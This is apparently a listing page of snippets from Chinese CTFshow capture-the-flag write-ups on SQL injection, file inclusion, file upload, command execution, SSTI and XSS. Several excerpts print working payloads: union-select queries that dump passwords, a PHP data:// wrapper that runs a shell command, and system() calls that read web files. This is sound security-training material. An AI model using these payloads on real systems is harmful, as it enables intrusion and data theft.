CTFSHOW

【Web】文件包含+php伪协议例题wp

目录①[SWPUCTF2021新生赛]include②[SWPUCTF2021新生赛]PseudoProtocols③[BSidesCF2020]Hadabadday④文件包含一些姿势(摘自ctfshow
Z3r4y·2023-11-19 15:01

CTFshow-PWN入门-前置基础-全篇

本文主要详解CTFshow中pwn入门系列的前置基础模块,共30道题所用工具:linux环境下的虚拟机、IDAPro、exeinfope参考博客:T1ngSh0w的博客ctfshowpwn入门|雲流のLowestWorld
Jugg_xie·2023-11-17 05:32

ctfshow SQL注入专题

哦对了,这篇文章还没写完,更新中...emmm又是好久没更新了...之后就在这里做个记录吧,有些新的思路可以做些分享web174看了一下,应该是有数字或者username=flag就不输出,主要是这个数字的限制有点烦,flag里面肯定是有数字的...网上的wp很多用的布尔盲注,不过我当时还是想直接注出来,还是有办法的。参考前面几道题,可以使用to_base64函数,对于一个字符而言,不管是数字还是
yink12138·2023-11-15 07:39

ctfshow刷题日记sql注入篇

web171没有任何过滤那应该在这张表里面,直接用1'or'1'='1即可拿到表单的所有信息(也可以直接查询)web172添加了限制条件,上面的不能用了,还是单引号闭合,直接联合查询最终payload:-1'unionselect1,(selectpasswordfromctfshow_user2whereusername=flag);--+或者直接爆他所有的内容。-1'unionselect1,
Yan9.·2023-11-15 07:39

ctfshow web入门 sql注入

无过滤注入web171查询语句$sql="selectusername,passwordfromuserwhereusername!='flag'andid='".$_GET['id']."'limit1;";单引号闭合,未做任何过滤payload:1'unionselect1,group_concat(table_name),3frominformation_schema.tableswhere
S1nJa·2023-11-15 07:08

ctfshow web 入门 sql注入

171、常规题型(需要把前面数字换为-1,注释用--+)查数据库payload=“-1’unionselect1,2,group_concat(table_name)frominformation_schema.tableswheretable_schema=database()--+”查列名payload="-1’unionselect1,2,group_concat(column_name)f
放空 123·2023-11-15 07:08

ctfshow web入门 sql注入(持续更新)

文章目录web171web172web173web174web175web176web177web178web179web180-182web183web184web185-186web187web188web189web191web199-200web201web202web171第一题嘛,都是最基础的,单引号闭合,用联合查询注入即可。1'orderby3----1'unionselect1,2
Lum1n0us·2023-11-15 07:07

ctfshow web入门 sql注入wp(未完)

目录web171题目源码解题思路Payloadweb172题目源码解题思路Payloadweb173题目源码解题思路Payloadweb174题目源码解题思路PayloadEXPweb175题目源码解题思路Payloadweb176题目源码解题思路Payloadweb177题目源码解题思路Payloadweb178题目源码解题思路Payloadweb179题目源码解题思路Payloadweb180
久而不念·2023-11-15 07:07

CTFSHOW web入门 sql注入 无过滤注入 web171-175

目录web171web172web173web174web175web171select查询语句//拼接sql语句查找指定ID用户$sql="selectusername,passwordfromuserwhereusername!='flag'andid='".$_GET['id']."'limit1;";尝试万能密码id=1'or'1'='1,进行查询,发现查询结果是数据库中全部内容,成功获得
起名字怎么这么难·2023-11-15 07:35

ctfshow web入门 sql注入(超详解)201-250

web201查询语句//拼接sql语句查找指定ID用户$sql="selectid,username,passwordfromctfshow_userwhereusername!='flag'andid='".$_GET['id']."';";返回逻辑//对传入的参数进行了过滤functionwaf($str){//代码过于简单,不宜展示}需要学会:使用--user-agent指定agent--u
Yn8rt·2023-11-15 06:33

[CTFSHOW][WEB入门] SQL注入

web171参数类型字符型SQL语句SELECT注入方式回显注入查询语句//拼接sql语句查找指定ID用户$sql="selectid,username,passwordfromctfshow_userwhereusername!='flag'andid='".$_GET['id']."'limit1;";#确定回显列数-1'unionselectNULL,NULL,NULL--+#查询当前数据库
fallingskies22·2023-11-15 06:03

ctfshow-web入门-sql

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档ctfshow-web入门-sql题目一、web171二、web172三、web173四、web174五、web175六、web176七、
林本·2023-11-15 06:03

ctfshow web入门174

题目给出了查询语句和返回逻辑先看查询语句$sql="selectusername,passwordfromctfshow_user4whereusername!='flag'andid='".$_GET['id']."'limit1;";这里能直接看出来是使用单引号进行绕过是一个字符型注入继续,查看返回逻辑if(!preg_match('/flag|[0-9]/i',json_encode($re
Jt2312·2023-11-15 06:31

ctfshow学习记录-web入门(sql注入171-180)

目录web171web172web173web174web175web176web177web178web179web180web171解答:打开页面,提供了sql语句源码,是单引号闭合。这里可以用1'and'1'='1和1'and'1'='2测试一下闭合。1'and'1'='1正常显示,1'and'1'='2不正常显示。单引号完全闭合,且不过滤空格,and等。确定列数,同时确定可回显位置,经过测
九枕·2023-11-15 06:30

ctfshow web入门 sql注入做题记录

ctfshowweb入门sql注入前言,感谢y4师傅详尽的教程[CTFSHOW]SQL注入(WEB入门)_Y4tacker的博客-CSDN博客_ctfshowsql注入sql注入的产生:php中对数据库的操作非常简化
AshMOB·2023-11-15 06:29

ctfshow sql入门174 175脚本

因为觉得脚本写的太烂了,二分法也迷迷糊糊的主要是python怎么学的那么烂!!再研究一下174布尔盲注这是不使用二分法的importrequestsurl='http://e9a1012f-6cb2-451d-9084-0d011dfcff89.challenge.ctf.show/api/v4.php'flag=''foriinrange(60):forjinrange(32,128):payl
木…·2023-11-15 06:55

ctfshow-184 sql注入

已知条件:flag格式:ctfshow{这个字符开头。好多wp和官方视频没有解释为什么要使用$user_count=43,来做判断条件,基本不好的小白就很难受了。
yxlr_beta·2023-11-14 20:49

ctf php sql注入,CTFshow-WEB入门-SQL注入(下)(持续更新)

web227按照上一题的方法,发现查不出flag表了,把ctfshow_user表给爆了一下也没flag,然后写一句话马,蚁剑连上去还是找不到flag,人傻了。。。
itwebber·2023-11-14 20:46

CTFshow-WEB入门-SQL注入(上)

web171无任何过滤,直接注就完事了。'unionselect1,2,group_concat(password)fromctfshow_user---web172'unionselect1,group_concat(password)fromctfshow_user2--+web173'unionselect1,2,group_concat(password)fromctfshow_user3
bfengj·2023-11-14 20:44

ctfshow- sql注入(web入门)

目录web171web172web173web174web175WEB176web177web178web179web180web181—182(180也可以用)web183web184web171简单的注入//查表名payload="1'unionselect1,2,group_concat(table_name)frominformation_schema.tableswheretable_s
ZredamanJ·2023-11-14 20:43

【CTF】CTFshow-SQL注入(持续更新)

【CTF】CTFshow-SQL注入(持续更新)就剩一年的大学时光了,最近也很迷茫,想找实习,又得考托福,又想提前开始毕设,假期前又要上学校安排的实训,马上还又有一门考试,事情一堆,但又感觉整天不知道自己应该做什么
Sunny-Dog·2023-11-14 20:12

ctfshow-sql注入-超详解(172-200)

前言今天是2021/7/25,正式进入sql注入专题,目标:加强python的学习,达到通过写python脚本,加快注入速度的程度,掌握sql在php编程中的一系列查询语句。新手区可以看看Y4师傅以前记录的小笔记SQL注入之MySQL注入的学习笔记(一)SQL注入之MySQL注入学习笔记(二)2021-7-25web172、web173——hex()、to_base64()查询语句//拼接sql语
Yn8rt·2023-11-14 20:42

CTFSHOW-SQL注入-二

title:CTFSHOW-SQL注入(二)date:2021-09-2509:32:11tags:CTF-WEBCTFSHOW-SQL注入(二)这里是ctfshowsql注入的第二篇题目:214-250
k1he·2023-11-14 20:42

CTFSHOW-WEB入门-SQL注入

文章目录前言web171web172web173web174web175web176web177web178web179web180web181-182web183web184web185-186web187web188web189web190web191web192web183web184堆叠注入前言最近发现对sql注入的相关知识点有点生疏和忘记了,做做ctfhshow的sql注入来巩固和学习一
天问_Herbert555·2023-11-14 20:41

ctfshow web-2(sql注入)

原题:ctf.show因为本人也是刚学sql注入,所以会尽可能的写的详细一点-------------------------------------------------1.判断是否可以进行sql注入关于进行sql注入的方法有三种。第一种:整型注入,单引号字符型注入,双引号字符型注入。我们首先使用万能账密的方式来一个一个试属于那种注入。关于万能账密,不是一个真实的账密,而是给出一个100%正确
花名咖啡·2023-11-14 20:39

CTFSHOW 文件上传

web151JS前端绕过直接上传png的图片马然后抓包修改为phpa=system("ls/var/www/html");a=system("cat/var/www/html/flag.php");web152和151一样的方法也可以实现上传a=system("ls/var/www/html");a=system("cat/var/www/html/flag.php");web153.user.i
双层小牛堡·2023-11-14 20:37

CTFshow-sql注入---弱类型转换

//拼接sql语句查找指定ID用户$sql="selectpassfromctfshow_userwhereusername={$username}";//返回逻辑//用户名检测if(preg_match('/and|or|select|from|where|union|join|sleep|benchmark|,|\(|\)|\'|\"/i',$username)){$ret['msg']='用
Flowers_beicheng·2023-11-14 20:37

ctfshow---sql注入(214-253)

目录web214web215web216web217web218web219web220web221web222web223web224web225web226web227web228-229-230web231web232web233-234web235-236web237web238web239web240web241web242web243web244web245web246web247we
T6...·2023-11-14 20:35

WEB ---- ctfshow ----- SQL注入

web171看题目$sql="selectusername,passwordfromuserwhereusername!='flag'andid='".$_GET['id']."'limit1;";//拼接sql语句查找指定ID用户我们能够控制的只有id的值,经分析,条件为username不为flag。可是只有用户名为flag才能输出正确的flag。第一步先判断是否有注入点。观察到存在单引号,所以
@See you later·2023-11-14 20:04

ctfshow---sql注入(171-213)

目录web171web172web173web174web175web176web177web178-179web180-182web183web184web185-186web187web188web189web190web191web192web193web194web195web196web197web198web199-200web201web202web203web204web205we
T6...·2023-11-14 20:04

CTFSHOW-sql注入

web171最简单的sql注入,先演示基本操作payload:-1'unionselect1,2,database()--+//得到数据库名为ctfshow_web-1'unionselect1,2,group_concat
超级兵_140·2023-11-14 20:33

CTFSHOW -SQL 注入

CTFshowsql注入上篇(web171-220)更新中-掘金【精选】CTFshow-WEB入门-SQL注入(上)_having盲注_bfengj的博客-CSDN博客web171基本联合注入拿到题目我们已经知道了是
双层小牛堡·2023-11-14 20:00

ctfshow sql171-179

mysql先打开我们本地的mysql,可以看到这些数据库information_schemainformation_schema库:是信息数据库,其中保存着关于MySQL服务器所维护的所有其他数据库的信息比如数据库名,数据库表,SCHEMATA表:提供了当前MySQL实例中所有的数据库信息,showdatabases结果取之此表TABLES表:提供了关于数据中表的信息COLUMNS表:提供了表中的
木…·2023-11-14 10:42

CTFshow—爆破、命令执行

Web入门:爆破:web24伪随机数通过mt_srand()分发种子(播种),有了种子后随机数也就确定了(随机就那一组了,因此说伪随机)mt_scrand()//播种MersenneTwister随机数生成器。mt_rand()//生成随机数详细请参考:php伪随机数解题脚本:web28要求扫描目录扫描这两个目录,各从0到100但扫描时注意不能加上2.txt否则就是扫描文件了,而不是扫描目录一般目
D.MIND·2023-11-12 10:47

ctfshow之_萌新web1至web7

一、访问在线靶场ctfshowctf.showhttps://ctf.show/challenges如下图所示,进入_萌新赛的web1问题:如上图所示,页面代码提示id=1000时,可以查询到flag,进行如下尝试:如下图所示,传入参数id=1时,显示出了标题(title)和内容(content)。如上图所示,可以看到查询sql语句,尝试使用id=1orid=1000,截图如下:如上图所示,只显示
XiaoXiao_RenHe·2023-11-08 22:30

ctfshow-web入门命令执行29-36

29源代码给了禁用flag使用tac、nl?c=echo`nlf*`;?c=echo`tacf*`;30多禁用了system和php和上题区别不大,使用上一题命令就能解?c=echo`nlf*`;?c=echo`tacf*`;31禁用了空格使用%09代替?c=echo%09`tac%09f*`;32禁用了echo使用php伪协议?c=include$_GET["1"]?>&1=php://filt
一本正经光头强·2023-11-01 17:49

ctfshow-web入门37-52

include($c);表达式包含并运行指定文件。使用data伪协议?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==是base64加密源代码查看得到flag38多禁用了php和file。不会改变伪协议,继续使用上一题
一本正经光头强·2023-11-01 16:40

ctfshow_rsa刷题记录

ctfshow-rsa刷题记录1.easyrsa72.easyrsa83.funnyrsa24.unusualrsa11.easyrsa7已知信息:e,n,c,p的高位。
te_mgl·2023-11-01 02:43

[SWPUCTF 2021 新生赛]hardrce_3 无字母rce 自增

这里直接可以在之前ctfshow的yu师傅那边拿payload因为都是,assert($_POST[_]);$_=[];$_=@"$_";$_=$_['!'
双层小牛堡·2023-10-31 15:13

[CTF]CTFSHOW php特性练习笔记

89104数组绕过。105$value){if($key==='error'){die("whatareyoudoing?!");}$$key=$$value;}foreach($_POSTas$key=>$value){if($value==='flag'){die("whatareyoudoing?!");}$$key=$$value;}if(!($_POST['flag']==$flag))
Sapphire037·2023-10-25 05:35

[HCTF 2018] Hide and seek(buuctf),Unzip(ctfshow

考核完对python软连接还是不熟悉,把这两道题在做一下[HCTF2018]Hideandseek登录注册之后发现可以上传文件,随便上传一个回显说不是zip文件上传一个zip文件,发现他会自动解析上传了一个GIF89a应该是python软链接,尝试一下把/etc/passwd创建一个软连接然后进行压缩移动到windows进行连接发现成功被解析创建读取flag的软连接发现没有回显,那应该是有其他的限
呕...·2023-10-20 19:38

ctfshow_web316-326_反射型XSS

ctfshow_web316-326_反射型XSSWeb316反射型XSS法一:自己有服务器域名法二:使用ceye网址临时域名法三:使用xss平台普通反射型XSS方法总结web317反射型XSS带过滤用
Yeah’s blog·2023-10-20 07:19

SSTI模板注入漏洞详解(包含ctfshow web入门361)

SSTI模板注入SSTI的概念SSTI(Server-SideTemplateInjection)从名字可以看出即是服务器端模板注入。比如python的flask、php的thinkphp、java的spring等框架一般都采用MVC的模式,用户的输入先进入Controller控制器,然后根据请求类型和请求的指令发送给对应Model业务模型进行业务逻辑判断,数据库存取,最后把结果返回给View视图
T1ngSh0w·2023-10-19 08:43

session 反序列化

原理详解ctfshow新手杯剪刀石头布这里我们可以发现服务器使用的处理器为php_serialize,与当前页面处理器不同,在反序列化的时候会造成一些问题。
El.十一·2023-10-18 06:23

ctfshow-ssti

web361名字就是考点,所以注入点就是name先测试一下存不存在ssti漏洞利用os模块,脚本查看一下子类的集合?name={{''.__class__.__base__.__subclasses__()}}看看有没有os模块,查找os利用这个类,用脚本跑他的位置importtimeimportrequestsurl='http://c73d3bdd-59d0-449a-bfcd-b683b92
木…·2023-10-13 00:40

ctfshow-web12(glob绕过)

打开链接,在网页源码里找到提示要求以get请求方式给cmd传入参数尝试直接调用系统命令,没有回显,可能被过滤了测试phpinfo,回显成功,确实存在了代码执行接下来我们尝试读取一下它存在的文件,这里主要介绍两个函数scandir()函数:返回一个数组,其中包含指定路径中的文件和目录。若成功,则返回一个数组,若失败,则返回false。如果directory不是目录,则返回布尔值false并生成一条E
kali-Myon·2023-10-11 15:13

ctfshow-反序列化篇

一篇文章带你深入理解漏洞之PHP反序列化漏洞POC参考:https://blog.csdn.net/miuzzx/article/details/110558192https://tari.moe/2021/04/06/ctfshow-unserialize
一碗海鲜汤·2023-10-10 21:56

CTFSHOW-web(7/11)

文章目录WEB07WEB11WEB07进入目录可以发觉到本题考察的是sql盲注尝试注入经过测试,可以发现本题过滤了空格,在这里可以使用/**/进行代替又是空格绕过,之前刚做过的在CTFHUB上空格绕过题,具体详细就不再细说直接操作吧爆数据库pythonsqlmap.py-u"http://f66c0d56-a8ad-4963-b3e3-31e645aed75c.challenge.ctf.show
唤变·2023-10-10 03:28

ctfshow-WEB-web11( 利用session绕过登录验证)

ctf.showWEB模块第11关用session中保存的密码进行登录验证,将session中保存的密码清空即可绕过页面中直接给了源码,很明显是让我们进行代码审计,源码中将我们输入的密码与session中保存的密码进行匹配,两个password相同即可登录成功右键检查或者按F12,进入开发者模式,查看浏览器的session,后端代码就是拿这个session的value值与我们输入的密码进行匹配,由
士别三日wyx·2023-10-10 03:26

CTFshow--web入门--文件上传

~目录~开始web151改后缀/禁jsweb152改后缀web153.user.iniweb154、155.user.ini+短标签web156{}web157、158、159反引号执行命令web160日志包含绕过web161幻术文件头web162、163session文件包含+条件竞争web164PNG图片二次渲染web165JPG图片二次渲染web166zip文件上传web167.htacce
7evenQn·2023-10-10 03:54
上一页 1 2 3 4 5 6 7 8 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他